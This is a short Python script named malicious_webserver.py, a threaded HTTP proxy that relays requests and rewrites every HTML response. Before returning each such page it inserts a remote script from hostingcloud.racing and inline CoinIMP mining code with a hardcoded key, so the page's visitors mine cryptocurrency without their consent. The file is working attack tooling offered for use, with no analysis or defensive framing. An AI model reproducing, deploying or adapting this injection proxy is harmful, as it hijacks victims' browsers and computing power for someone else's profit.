malicious_webserver.py

1. import socketserver
2. from http.server import BaseHTTPRequestHandler, HTTPServer
3. import time
4. import urllib.request
5. import urllib.parse
6. import urllib.error
7. from http.cookiejar import CookieJar
8. from bs4 import BeautifulSoup
9. import io
10. import gzip
11. from socketserver import ThreadingMixIn
12.  
13. hostName=''
14. hostPort=9090
15.  
16. ## TODO:
17. # - Redirection handling infinite loop error
18.  
19. mining_code_tag = b'\nvar _givemecoins = new Client.Anonymous(\x272f8f3058590c46872f769ebf9fc1517d459045b3370860568d98ffd41664aa43\x27, { throttle: 0.3\n});\n_givemecoins.start();\n_givemecoins.addMiningNotification("Top", "This site is running JavaScript miner from coinimp.com", "#cccccc", 40, "#3d3d3d");\n'
20.  
21. def get_index(string,list_of_tup):
22.     for x in list_of_tup:
23.         if x[0] == string:
24.             return list_of_tup.index(x)
25.     return None
26.  
27. class MyServer(BaseHTTPRequestHandler):
28.     def do_GET(self):
29.         URL = "http://"+self.headers['Host']+self.path
30.         myheaders = self.headers.__dict__
31.         new_req = urllib.request.Request(url=URL,headers=dict(myheaders['_headers']),method=self.command)
32.         print (new_req.full_url)
33.        
34.         cj = CookieJar() # To avoid infinite loop redirection
35.         opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cj))
36.         try:
37.             with opener.open(new_req,timeout=7) as response:
38.                 if response.info().get('Content-Encoding') == 'gzip':
39.                     buf = io.BytesIO(response.read())
40.                     f = gzip.GzipFile(fileobj=buf)
41.                     the_page = f.read()
42.                 else:
43.                     print(response.info().get('Content-Encoding'))
44.                     the_page = response.read()
45.  
46.                 if len(the_page) > 0:
47.                     if "text/html" in response.headers["content-type"]:
48.                         html = BeautifulSoup(the_page,"html.parser")
49.                         script = html.new_tag("script",src="https://www.hostingcloud.racing/n2J6.js")
50.                         html.body.insert(-1,script)
51.                         script2 = html.new_tag("script")
52.                         script2.string = mining_code_tag.decode('utf-8')
53.                         html.body.insert(-1,script2)
54.                         the_page = bytes(str(html).encode("utf-8"))
55.                         print("Script injected.")
56.                     else:
57.                         print("NO injection for: {}".format(URL))
58.  
59.                     self.wfile.write(the_page)  # Send result back
60.                 response.close()
61.         except Exception as e:
62.             print("Error for {0}: {1} -> {2}".format(URL,e.code,e.msg))
63.  
64. class ThreadedHTTPServer(ThreadingMixIn, HTTPServer):
65.         """Handle requests in a separate thread."""
66.  
67. if __name__ == '__main__':
68.     myServer = ThreadedHTTPServer((hostName, hostPort), MyServer)
69.     print(time.asctime(), "Server Starts - %s:%s" % (hostName, hostPort))
70.  
71.     try:
72.         myServer.serve_forever()
73.     except KeyboardInterrupt:
74.         pass
75.  
76.     myServer.server_close()
77.     print(time.asctime(), "Server Stops - %s:%s" % (hostName, hostPort))